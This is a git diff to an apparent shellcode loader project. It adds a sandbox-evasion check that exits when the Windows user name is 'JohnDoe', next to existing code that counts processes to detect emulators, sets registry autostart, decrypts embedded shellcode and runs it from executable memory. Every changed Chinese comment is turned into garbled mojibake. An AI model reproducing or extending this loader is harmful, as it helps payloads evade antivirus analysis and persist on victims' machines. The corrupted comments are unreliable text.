diff --git a/plug/Dynamic Load plus/public.hpp b/plug/Dynamic Load plus/public.hpp index 4376bfc..6bae130 100644 --- a/plug/Dynamic Load plus/public.hpp +++ b/plug/Dynamic Load plus/public.hpp @@ -90,7 +90,7 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } @@ -123,11 +123,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } @@ -228,4 +228,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize); StreamCrypt(shellcode, shellcodeSize, config.key, 128); return shellcode; -} \ No newline at end of file +} diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp index 4ae8967..03efe61 100644 --- a/plug/Dynamic Load/public.hpp +++ b/plug/Dynamic Load/public.hpp @@ -5,6 +5,9 @@ typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo); typedef HGLOBAL(WINAPI *pfnLoadResource)(HMODULE hModule, HRSRC hResInfo); typedef LPVOID(WINAPI *pfnLockResource)(HGLOBAL hResData); +#define numSandboxUser 1 +const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; + /********************************************************************** * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) @@ -79,6 +82,9 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { + WCHAR username[3267]; + DWORD charCount = 3267; + HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -90,10 +96,21 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } + + if (!GetUserName(username, &charCount)) { + return; + } + for (int i = 0; i < numSandboxUser; ++i) { + if (wcsicmp(username, sandboxUsername[i]) == 0) { + exit(1); + } + + } + } /********************************************************************** @@ -123,11 +140,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } @@ -165,4 +182,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize); StreamCrypt(shellcode, shellcodeSize, config.key, 128); return shellcode; -} \ No newline at end of file +} diff --git a/plug/TLS Callback Load/public.hpp b/plug/TLS Callback Load/public.hpp index 0dc3e4f..405f39e 100644 --- a/plug/TLS Callback Load/public.hpp +++ b/plug/TLS Callback Load/public.hpp @@ -88,7 +88,7 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } @@ -121,11 +121,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } @@ -151,8 +151,8 @@ void GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) //2.Initialization memcpy(&config, pBuffer, sizeof(CONFIG)); init(config.antisandbox, config.autostart); - //3.Getshellcode //TLS回调函数中不能使用new分配内存,否则会出现访问错误,所以直接分配可执行内存 + //3.Getshellcode //TLS鍥炶皟鍑芥暟涓笉鑳戒娇鐢╪ew鍒嗛厤鍐呭瓨锛屽惁鍒欎細鍑虹幇璁块棶閿欒锛屾墍浠ョ洿鎺ュ垎閰嶅彲鎵ц鍐呭瓨 Memory = VirtualAlloc(NULL, totalSize - sizeof(CONFIG), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, (char *)pBuffer + sizeof(CONFIG), totalSize - sizeof(CONFIG)); StreamCrypt((unsigned char*)Memory, totalSize - sizeof(CONFIG), config.key, 128); -} \ No newline at end of file +} diff --git a/plug/public.hpp b/plug/public.hpp index 625effc..f9e825d 100644 --- a/plug/public.hpp +++ b/plug/public.hpp @@ -1,5 +1,7 @@ #include #include +#define numSandboxUser 1 +const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; /********************************************************************** * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) @@ -75,6 +77,9 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { + WCHAR username[3267]; + DWORD charCount = 3267; + HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -86,10 +91,21 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } + + if (!GetUserName(username, &charCount)) { + return; + } + for (int i = 0; i < numSandboxUser; ++i) { + if (wcsicmp(username, sandboxUsername[i]) == 0) { + exit(1); + } + + } + } /********************************************************************** @@ -119,11 +135,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } @@ -154,4 +170,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize); StreamCrypt(shellcode, shellcodeSize, config.key, 128); return shellcode; -} \ No newline at end of file +}